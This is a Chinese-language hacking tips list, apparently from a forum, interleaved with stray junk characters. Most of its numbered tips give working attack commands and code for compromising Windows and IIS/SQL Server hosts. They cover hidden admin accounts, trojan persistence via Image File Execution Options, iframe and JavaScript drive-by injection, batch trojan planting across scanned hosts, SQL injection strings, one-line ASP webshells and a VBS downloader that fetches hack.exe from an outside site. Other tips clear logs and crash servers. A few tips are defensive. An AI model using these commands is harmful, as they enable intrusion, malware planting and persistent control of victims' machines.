1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 z# g3 l) v, {* o3 b9 a6 \
cacls C:\windows\system32 /G hqw20:R
+ o$ p, B: y) a: r! z思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入7 N2 r( _: S# N1 D( J* H( c
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F/ [8 n- J) [2 W& e& E' @
+ a* q5 R" n/ i1 p' Q: x4 D2 L6 r5 \2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。3 ^, O3 I! d' ~
. n* g" J- g+ B. x/ n3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
" \% B. z# `# |6 P2 i9 b( e4 G- ^2 _2 f
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号/ G* C- F! C/ Y! j, D6 E2 |$ l; b# w
1 Y! p) f; @0 x8 X; |
5、利用INF文件来修改注册表
8 U; s0 \" u8 `[Version]
/ H1 r+ R- x' M' f4 R) h" K" A+ kSignature="$CHICAGO$"8 M: B e; C4 g
[Defaultinstall]
4 T6 a4 Z& s$ f; P; m3 MaddREG=Ating% `+ C9 x E$ t# g: p
[Ating]
3 e' Y2 s' C; y* @2 J) v* N E$ iHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"" l3 w v; M" i! E4 J( Y, m. x
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: u5 E! b# H& a, f+ i+ @) Drundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
, u$ y8 _; o# n其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
2 d% g: s; _ ^6 zHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU! h% b9 a) T& J
HKEY_CURRENT_CONFIG 简写为 HKCC' o* C; C" O2 h0 ` K0 }7 e2 l4 \$ i* x
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
9 D& a! A; G) j7 ]: k& Q8 O"1"这里代表是写入或删除注册表键值中的具体数据7 I& v, l6 \8 C' f. u, U- l
. Q; Z/ R- W! Z/ ^* \4 r6 _6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
5 S5 Y; o! d: U5 z$ f* e; D f9 T多了一步就是在防火墙里添加个端口,然后导出其键值3 H6 P* J2 |0 j: {
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ }$ Q7 M. o4 |, J* Z
& G4 J0 C7 R# O8 u7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
z' Z9 T/ b( [1 H4 _- n( H- ]: q在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 D/ u, |2 R/ a
( v4 U% e) R6 }2 x$ ^; o' ~% }) @8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 q! |8 x+ V& U3 \( z9 ^* o
3 \% [: m" Q3 ]( d) j* Y0 S$ M9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
4 D3 Q7 O/ c8 x1 U4 _1 N @可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
7 I/ \4 k8 z, ~% d$ D" P
" x0 g8 z! q3 U" t& h4 r10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
V* J$ r( {. @. W( M; k& U
; _1 J+ ~% M! t1 Q1 v u Q4 W11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 O# D& ]6 x9 ?( `8 R! A7 V' ~用法:xsniff –pass –hide –log pass.txt) N4 c. q- R: t; S
/ c# |7 X7 Y( e3 @8 h12、google搜索的艺术7 ?/ ]# ?* f, h
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
( `/ q! u5 L$ `) P( C& C或“字符串的语法错误”可以找到很多sql注入漏洞。. m1 M% `4 g2 k$ l: D0 L, }$ j
8 H' y6 B2 f/ P* l0 Y13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。/ l2 x/ _* ?- G( N
4 Y+ `0 E) J, j1 i$ N14、cmd中输入 nc –vv –l –p 1987
9 u) j$ {& c4 f做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% j* e9 x4 Q" T* D3 w6 R$ L! f( `2 d$ O( [
15、制作T++木马,先写个ating.hta文件,内容为
% Q/ J% o* s9 w$ u<script language="VBScript">* q5 i; {& [" N. f5 L
set wshshell=createobject ("wscript.shell" )
- N6 L& M) s- E6 D) ^; Ia=wshshell.run("你马的名称",1)) @, p, d$ q* x) G5 ^% z
window.close+ L. N2 @ P% M; p
</script>
* x0 M& Y. Y9 `" U4 X, t再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。* g- j2 Y9 c- U& M
* L3 @3 ~( J8 i4 H1 s16、搜索栏里输入8 r8 k7 k5 m9 } k) d
关键字%'and 1=1 and '%'='9 n5 ^! p% S" X0 }! O% S
关键字%'and 1=2 and '%'='2 Y& s* `9 Q6 E
比较不同处 可以作为注入的特征字符
/ x2 d5 B) K8 g6 g% @1 t5 D F9 d9 x5 f; ~( I+ j Q
17、挂马代码<html>3 Z# q& d. m4 Q, B. z8 P
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 b% O, ^( y# q% u* K9 ^* K</html>
! z6 K5 @* `6 I# g0 p; o' {# J% ^5 q9 y) i0 w3 P" X! s& Z
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,6 h0 ]3 i+ x4 D
net localgroup administrators还是可以看出Guest是管理员来。
8 N1 I F0 n' q
9 A! O l% G% X$ c: ~- l19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
) E! ~) o: h9 D- ?" j用法: 安装: instsrv.exe 服务名称 路径
C9 ^# E2 b& J1 i0 q卸载: instsrv.exe 服务名称 REMOVE3 G( M) U: c9 x7 k+ S
. q+ I+ y) M$ {/ ^
9 c: R" D+ w6 O1 o x
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉1 {9 k. b8 n1 ?8 z, j7 ^3 L$ L. }
不能注入时要第一时间想到%5c暴库。
1 ^% _& Q! K4 \$ R& c1 u0 e2 W. o8 \. N2 Q3 \0 O y% U
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
: d3 W5 v" i! X5 A! ]& T- l
% Q/ t o% ?. f5 Z23、缺少xp_cmdshell时. j) b* C* S; w0 @, x& B
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 @6 b" W e2 Q0 g9 R( B( S假如恢复不成功,可以尝试直接加用户(针对开3389的)
, C" |/ N0 Q. q5 L5 o2 I6 kdeclare @o int _# W+ d$ ?% V7 }9 T5 i9 i( ?
exec sp_oacreate 'wscript.shell',@o out
/ E. h. {3 h9 V, L9 n. E' Jexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
* j& `0 p/ ^4 k. A: J
) Z# e" x& G' {$ ^/ {9 m4 a N* [24.批量种植木马.bat# |; Q' ]! U- p) \
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
& I8 L" {% y; i9 ifor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间( q A( l. Y8 a& C! q
扫描地址.txt里每个主机名一行 用\\开头
% o, z6 Z3 U4 H8 S( O* Q: R
) N# ]) Z! w6 z25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。; f/ d# Q, s# f* ?( b
6 Y3 T; P/ `3 z. r5 C3 \* \
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
+ Z4 ^* i L# }/ S; _3 R! p将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.4 \5 v+ H7 e* ^( u- |9 P
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
5 G( s8 `/ [; w
9 f$ ?7 x: o+ C" E' d6 y% H; C27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP% u% |; [3 [7 J1 `
然后用#clear logg和#clear line vty *删除日志
' Y2 B+ r" F2 E: v P% h( R( e
5 p* @: J/ B1 t& j! ?% H* a t" c28、电脑坏了省去重新安装系统的方法5 P9 e# ]+ T* X( {( Q- p ?9 M Z& Z% l
纯dos下执行,% ?; Y- S! G5 r, B U$ @
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
& k* \# ?! \! }' E R, g$ z6 N Z- F& ?2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
" B5 y1 G+ y) U. l( ]% A; [ G0 A; I* q4 G
29、解决TCP/IP筛选 在注册表里有三处,分别是:0 K- b7 `3 D; ]. }6 T
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
$ P/ B0 L; x- m" M% R3 ?/ t* Z) H5 d. nHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% y- F( Y E9 q7 i# T) sHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* A6 Z$ h2 U( D8 m& {+ r
分别用
P) H6 V0 {( `% F+ m+ }+ D. k3 R' B) oregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; m# I6 [6 w5 E5 p1 Q
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip ~0 X. E" h3 e3 z' w
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 x% `, F& p1 c( m* S% K9 O) g
命令来导出注册表项
" ~% z4 y+ U5 h. j. ?; ]4 M然后把三个文件里的EnableSecurityFilters"=dword:00000001, e) ~. q \. v3 \, N
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
4 Y1 D9 ~3 ^( Q" N( W$ O. vregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。3 k' m' E C$ {
- q( T( }) C+ Z30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U' W: ], c8 x1 F
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
5 h' v) Q- i5 M o; X! N' y. h; w, W$ Q& Q8 i& t. w
31、全手工打造开3389工具4 B& D3 X* N6 G
打开记事本,编辑内容如下:9 _3 T+ X5 C( k6 ^* N
echo [Components] > c:\sql+ [7 x! W8 f( N
echo TSEnable = on >> c:\sql6 e# j' U3 p& u$ ?0 F1 G3 p# ]
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( b( _. x4 r: V. d* O编辑好后存为BAT文件,上传至肉鸡,执行$ F4 \. s0 X# q
! s# r$ D3 B0 O/ \/ R( O0 X! _* b
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
* D5 a; N/ W D
& b/ Z: t# l8 y# Y7 G33、让服务器重启
7 E; {$ ~+ Y" H写个bat死循环:, ]' `$ n* n0 b
@echo off. E1 i/ B! ]. H
:loop15 L& ^ H4 m6 K* c7 w1 w. ?
cls# O+ a( F" @: h: b
start cmd.exe9 [. ]1 G' _9 O! ?7 W
goto loop1
8 T3 {) \/ m- N9 T# l; A保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
4 _6 Z! Q$ i/ s; F. q" o- L- Z- [) A# _. y
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,4 _5 ]" S; u2 h: e( e, @/ | b
@echo off3 j" ?3 I, e; _# V$ n
date /t >c:/3389.txt0 @2 E) m& o+ m7 D; N
time /t >>c:/3389.txt
( Q! B7 r( R) Cattrib +s +h c:/3389.bat
' S# C5 I9 L) o, s% l w: uattrib +s +h c:/3389.txt
1 H' }6 T1 P8 |$ K W8 o5 f9 w' a5 [netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ f6 y# d F9 e% A并保存为3389.bat& f9 k# O; I7 I$ z
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号4 p1 v4 R$ `5 Q" }3 x- h% G9 z
* G `' b/ S' B: O35、有时候提不了权限的话,试试这个命令,在命令行里输入:3 D$ `5 B% q( Z: G9 x/ Y# O% v
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)7 `) L& U/ \& a! L
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 Z+ e) l0 X* i+ _2 \: o$ e' Q. ^0 d/ n! t: Q9 L
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
8 P6 S4 o5 Y. z9 |9 z0 p3 u$ m6 T; Xecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址, T) A& W% g8 @
echo 你的FTP账号 >>c:\1.bat //输入账号3 R4 E( W. ~6 z; |
echo 你的FTP密码 >>c:\1.bat //输入密码. _) L) U+ \9 d5 [8 A9 c, \) i8 K9 ?; G
echo bin >>c:\1.bat //登入
8 }' ~3 n4 X$ Z/ f) C) k& A2 Cecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么& I# J$ t' l8 |4 ~ `; n4 x5 Q1 ~
echo bye >>c:\1.bat //退出
4 k' B# r' L4 Q9 s" D然后执行ftp -s:c:\1.bat即可( P: v1 L2 u. Q; r- k" @
, n( l& y+ F, F- ]1 i7 J
37、修改注册表开3389两法
/ x$ G2 l) J. ^. q$ d2 R( L% R9 N(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表$ D2 e. P- m- s+ M P/ v% _
echo Windows Registry Editor Version 5.00 >>3389.reg
1 a# F& g4 s! k% v8 {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
) \. f. _3 Y6 O- |% gecho "Enabled"="0" >>3389.reg5 [- F+ s2 k& T1 V2 d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
8 e( r+ k3 |- UNT\CurrentVersion\Winlogon] >>3389.reg
# m. D) H2 ~) \9 { m% Pecho "ShutdownWithoutLogon"="0" >>3389.reg S1 J6 i1 _ B2 k" d# X( N/ H1 E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
8 M* A5 x# R8 S; j2 x h( A' ^' F>>3389.reg
+ n$ [4 e; y) e" M4 w6 s. w/ fecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg# W8 W- b1 v9 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]5 r+ [2 E) B/ w4 W" M% @# ]4 `
>>3389.reg
/ N) S; M7 g3 h' ]( _4 vecho "TSEnabled"=dword:00000001 >>3389.reg4 C5 Z- g4 i& u6 k# P. u6 r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
! C4 f, r! @0 ^6 lecho "Start"=dword:00000002 >>3389.reg
. G# m1 G- n- `' g, N* hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]% |" ]% f f; Z
>>3389.reg
; M" `; G, T& X) n$ w- h) }echo "Start"=dword:00000002 >>3389.reg
9 S* T7 l) Y+ q: mecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
1 B& g$ G8 @' T7 d; y5 {- b' aecho "Hotkey"="1" >>3389.reg
- G8 X8 J/ l7 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 M+ Y: |' i1 ]Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 @4 x1 ^& Y$ }$ ]9 O* ?
echo "PortNumber"=dword:00000D3D >>3389.reg- Z& Q5 Y7 }( i" Y$ C8 R* a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' q' f: C6 {+ o! o: K8 q
Server\WinStations\RDP-Tcp] >>3389.reg5 }; ]7 W6 a4 l- {& Y
echo "PortNumber"=dword:00000D3D >>3389.reg7 l/ F- N2 ^' M
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。/ L# e; U4 j l; d$ G2 J/ d
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了), T( d# S9 j3 C/ k& a/ c( c; ~& W
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
" {/ j- s# M7 M2 h$ g+ W0 ^6 V& s(2)winxp和win2003终端开启
# l& n5 { H. P用以下ECHO代码写一个REG文件:$ g1 e4 }. N$ m$ D8 D7 R
echo Windows Registry Editor Version 5.00>>3389.reg" @4 g4 b( ~; a' i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 Z' A7 t, z' O" _% j0 K
Server]>>3389.reg
+ z; P7 T9 h. M0 T9 v9 h4 Oecho "fDenyTSConnections"=dword:00000000>>3389.reg
# C8 _) y% m. a/ X3 U: Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 F4 x/ j5 V }5 Z+ N4 S
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
5 X ]4 c& \ n; L+ D+ `2 |1 C8 G ]! cecho "PortNumber"=dword:00000d3d>>3389.reg
2 V5 ]5 W: L9 {8 I s5 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% @# ]2 n2 r6 h& o! @6 n6 H+ R! N
Server\WinStations\RDP-Tcp]>>3389.reg
* }3 ~# t. w( c, P; b3 h5 L+ Kecho "PortNumber"=dword:00000d3d>>3389.reg
1 h% ^1 A; z& V% s) K0 P然后regedit /s 3389.reg del 3389.reg
4 |: }# m9 Z+ ~: ^9 b% y7 ~XP下不论开终端还是改终端端口都不需重启. \- G) }6 G6 k8 B4 |7 @4 v
* ?! u% k# X; O( q38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
, W, B9 @* X& l$ n: l$ O7 y, h用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 @ P5 r6 i+ P. \9 ?4 B
3 d1 Y9 s2 [/ x+ W$ z+ Y# b
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 K' I2 o( v5 x9 _" z* S(1)数据库文件名应复杂并要有特殊字符 o6 ?) E& E- K9 `) i3 z1 d
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源: `# q/ I* X8 q+ W
将conn.asp文档中的% ~0 A% q7 C* w+ t! i+ \& [ d
DBPath = Server.MapPath("数据库.mdb")
5 V/ L# t, b. K0 Lconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath; ]% Q! Q* y H* q( M: p
8 t+ e5 t2 c% [( {6 Q8 Z0 U/ _
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
* V: N& T" }5 [(3)不放在WEB目录里+ T6 ^: L7 [5 F) o5 c
$ a* T6 S) d1 Q) t40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, Z! I8 v5 a& Q% _ }+ p可以写两个bat文件5 ]" r4 e: Q' m- [2 y
@echo off
: ?% d" d2 t! h9 F6 a1 M@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
$ t; k& W3 q2 V% l3 H4 ^0 }@del c:\winnt\system32\query.exe
" }0 d% J" n' z6 k@del %SYSTEMROOT%\system32\dllcache\query.exe+ O. Y1 L8 b3 n- @ w T3 g
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
@, T- v9 N' m! D; R; P, @# h6 H0 m/ K L9 h& Q6 Z
@echo off
$ _ ~2 Q( u# Z@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
& q' d2 r1 I i v@del c:\winnt\system32\tsadmin.exe
) y- P1 W4 p/ N8 k+ K* h6 V@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
E1 h* g# E9 b* B& o' b. u M0 D9 t6 `, P! t3 U
41、映射对方盘符/ E, k/ `9 `6 n* ~' j3 `1 ]
telnet到他的机器上,
9 a5 }- c& Y4 [* ~* H+ ]net share 查看有没有默认共享 如果没有,那么就接着运行
* ]4 B: V- [9 ] fnet share c$=c:
+ I, m1 X# {1 r2 x/ K% _net share现在有c$* k M. C- s M2 {1 p1 [# t
在自己的机器上运行
# U: I, [7 k4 \1 o. Lnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
3 J5 |" Q, X8 N3 r9 B8 ~$ [& s3 u: D1 c' S
42、一些很有用的老知识8 N0 X) g9 l) F7 k" y
type c:\boot.ini ( 查看系统版本 )+ b2 k% n! G$ v: [4 o- G: [
net start (查看已经启动的服务)
0 n# O, i1 {. b: ]1 f4 B' Z' fquery user ( 查看当前终端连接 )2 M2 M5 D+ Q; b! j1 `
net user ( 查看当前用户 )6 s% m7 ]& y# I. k" k
net user 用户 密码/add ( 建立账号 ), j& s( ^" S( M- ?+ t& a
net localgroup administrators 用户 /add (提升某用户为管理员)4 Y) E+ N7 b+ L9 J
ipconfig -all ( 查看IP什么的 )
- Y9 y: [& k1 S3 Onetstat -an ( 查看当前网络状态 )
) e7 z3 h0 d; g0 o' b R7 wfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)3 O* T/ _8 B8 n% g9 `% T" e2 w
克隆时Administrator对应1F4& ^3 E h4 v# U+ d7 ?
guest对应1F5
$ b9 j- A7 j% t6 q" Ltsinternetuser对应3E8
R3 u; T% s1 S! j% n( t: C! ^+ V/ H4 c/ u7 G
43、如果对方没开3389,但是装了Remote Administrator Service( a$ v- r. i. a
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接- p5 V( U+ }. Z+ z
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 M2 E# Y2 k$ O8 V2 T先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
; N% W3 D8 @2 P) P/ T4 H# z
4 {( P1 d: V+ P M; v& r1 c9 U44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
/ J0 b& L$ J; Z- Q1 ^% ]4 N j2 ?本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
8 x+ }7 R9 G& }6 X' o- f7 b! N) Z6 Y& J+ j
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入); C; Y0 R2 J2 U
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open9 o2 g3 d9 E6 y# s3 Q- q' |9 C l
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ u( D+ z% R% O: O' qCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
! V, v, B/ S1 x" ]0 D3 {7 d4 n' I! s1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
2 H, M9 D3 q, {* D+ u(这是完整的一句话,其中没有换行符)2 A9 s, R# U1 _! ?6 a0 _
然后下载:
7 M4 ^# v0 @$ |/ n: i* Xcscript down.vbs http://www.hack520.org/hack.exe hack.exe
( z( j/ Q2 b( L1 u3 g" Z
4 d% J. Y' K2 t# Y; A+ a46、一句话木马成功依赖于两个条件:6 q s% _$ |) w( ]
1、服务端没有禁止adodb.Stream或FSO组件
$ ~" u. j. x& ]' Q0 s2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 |. D# ^9 b. Y$ ~9 Z) s; n) z' p( r* L$ D* A! H+ F: e1 o% q/ Z2 V
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
$ a! k; J* `& A. \' J9 L0 c; u;alter database utsz set RECOVERY FULL--
0 w! |, Q9 z4 \4 N0 x3 n;create table cmd (a image)--
* p: {/ ^3 t0 f# x;backup log utsz to disk = 'D:\cmd' with init--; P; M1 ?; Z3 a0 v: L5 S, x. L1 v
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--3 v& v- }$ O& L3 N2 W1 b6 p/ J
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
# \: W1 h y' c( m4 ?8 E7 i注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
( ~8 f0 E1 K" v1 Z Q: `
' ?. `- i; D0 v( H; ?9 k6 X/ R+ p% E48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) G4 K9 h( ~, f6 M: Z/ B0 ]
8 e+ ?2 U3 v u) M+ L2 ]6 _: D用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options. f0 x: O) B3 X4 ~
所有会话用 'all'。
( y1 W V) }7 u3 K-s sessionid 列出会话的信息。
, I3 v7 ?+ y+ s- s" w0 q' l-k sessionid 终止会话。
& y& l- M {9 U: r6 w9 O& H n-m sessionid 发送消息到会话。
2 E; b; w% j$ @+ f% v/ K8 }5 [! k( s% |0 U
config 配置 telnet 服务器参数。
7 ]' q7 k! @3 r6 u" S
: k6 j0 q2 s) w. e: \8 Ncommon_options 为:$ c- T( ?3 |7 h8 Q3 M. F
-u user 指定要使用其凭据的用户
) l7 [- o- t S) w% U4 v-p password 用户密码
3 @/ l, S; z8 s& T- R+ B2 X2 ?* m' Y% \
. ~& H; ]( E% Y+ a" e: e' j+ @8 y& Hconfig_options 为:. D* j$ U6 w3 H! l$ P/ l; f6 h3 s
dom = domain 设定用户的默认域: T+ ~- n; c( F3 N) i
ctrlakeymap = yes|no 设定 ALT 键的映射- x& X* C& j# \2 G: ^, i2 a
timeout = hh:mm:ss 设定空闲会话超时值; E9 W5 @4 U+ ?2 Y6 U; T
timeoutactive = yes|no 启用空闲会话。
' p* U" g4 ]+ E$ ^3 zmaxfail = attempts 设定断开前失败的登录企图数。. w! g/ U6 n n' L
maxconn = connections 设定最大连接数。( {9 D5 Q; K$ z6 p/ f' _
port = number 设定 telnet 端口。
' e! r/ I5 E xsec = [+/-]NTLM [+/-]passwd
3 ~ u2 N2 j! o- l设定身份验证机构
( O; X4 ]2 Y1 F& X' |7 a/ |fname = file 指定审计文件名。
) \) A& B3 y/ g- p# _fsize = size 指定审计文件的最大尺寸(MB)。. u* G0 p$ B7 K2 T( R, ]
mode = console|stream 指定操作模式。
% I- C, d. h2 R$ t9 |auditlocation = eventlog|file|both2 |+ Z5 n: R _+ l* [/ p
指定记录地点" R% m% J; ^1 |; _5 e }
audit = [+/-]user [+/-]fail [+/-]admin
" C( E7 u c0 o3 J, U6 U8 C, t% G0 J0 v5 Z/ w4 k: y0 Q8 o0 W
49、例如:在IE上访问:9 o; D$ p. ^- r" H% t
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/* |9 W: d* h; l( D% T5 V. s" i6 @
hack.txt里面的代码是:6 Z! a; i' A# @2 I( |# T
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"> R, e5 p) h- J$ L$ I% E
把这个hack.txt发到你空间就可以了!* z- ~3 W3 Q/ Z( e9 e E
这个可以利用来做网马哦! t$ O8 _7 z6 `' @8 P3 H& q
2 _) F* D, D6 J" L. V50、autorun的病毒可以通过手动限制!9 z9 c, r* L6 }; I
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( H3 u0 d# C# p! O. J1 x% F2,打开盘符用右键打开!切忌双击盘符~: @: S8 v; ~; _$ |3 w0 J
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!- t2 {: I! \& t/ d% P3 G6 O- I' b
( }' u/ l" u S5 B1 `
51、log备份时的一句话木马:
+ f- V4 u/ J4 V) |1 za).<%%25Execute(request("go"))%%25>1 X6 B) b2 J; ^. _
b).<%Execute(request("go"))%>* t! g5 B p$ _: \% J- l! Y5 [
c).%><%execute request("go")%><%
0 E' O! J a8 z& U7 g1 u1 Id).<script language=VBScript runat=server>execute request("sb")</Script>( a, Y* }+ U, G- c( A: C+ @
